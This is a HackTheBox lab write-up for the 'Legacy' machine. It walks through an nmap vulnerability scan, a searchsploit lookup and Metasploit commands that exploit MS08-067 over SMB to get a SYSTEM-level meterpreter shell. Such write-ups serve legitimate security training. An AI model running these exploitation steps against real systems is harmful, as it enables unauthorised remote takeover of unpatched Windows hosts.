HackTheBox – Legacy Writeup

clock-img 10 Jan, 2022 
cat-img HackTheBox Writeups

HackTheBox – Legacy Writeup

Today we are gonna solve Legacy from hackthebox.eu. Legacy is an easy windows machine residing at the ip address 10.10.10.4 released on 15 July 2017. We use the exploit MS08-067 to attack this machine and gain system access. This machine is also vulnerable to MS17-010 Eternal Blue exploit.

HackTheBox – Legacy Writeup
HackTheBox – Legacy Writeup

Connecting to HTB Vpn:

1. First download the vpn file from the access page of hackthebox.eu

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4. You can access the machine at 10.10.10.4

Attack:

1. First let’s scan pur target machine using the network scanner nmap with the following flag

nmap -sV -A -p- –script vuln 10.10.10.4

-sV : to know the service versions at different ports

-A : to get all the information about the system like os,build,traceroutes

-p-: to scan all 65535 ports

–script vuln : to see if the machine is vulnerable to any exploits

2. We get the following results showing that port 139 and 445 are open.

The nmap results also shows us that this machine is vulnerable to exploits such as MS08-067 and MS17-010

Certified Ethical Hacking

solve Legacy from hackthebox
solve Legacy from hackthebox

3. Let do a quick search on these exploit using google and searchsploit

searchsploit ms08-067

HackTheBox - Legacy

4. From the searchsploit results we can see that there is a metasploit module for MS08-067, so let’s fire up metasploit

msfconsole

5. Now lets search for the exploit in the metasploit database with the following command

search ms08-067

6. We can see that there is a single exploit and that too a remote code execution so let’s choose this one

use exploit/windows/smb/ms08-067_netapi

7. After choosing the exploit w have to set the remote port and remote hosts which are going to attack

set RHOST 10.10.10.4

set RPORT 445

8. You can check whether all the options are properly set

show options

9. Now lets run our exploit with the following command

exploit

Legacy Writeup

10. Now we have a meterpreter shell on the system. Sometime it may take one to three tries for the exploit to work

11. You can who you are on the system by the meterpreter command

getuid

So now we are NT System that is we are the Administrator

12. After enumerating the system more you can see that the user flag is located in the desktop of the user john and the root flag is located at the desktop of the administrator

HackTheBox - Legacy Writeup

Thank You for Reading HackTheBox – Legacy Writeup

Don’t forget to check out our latest Blogs – HackTheBox – Sense Writeup

Courses

Training Calender

WhatsApp

Phone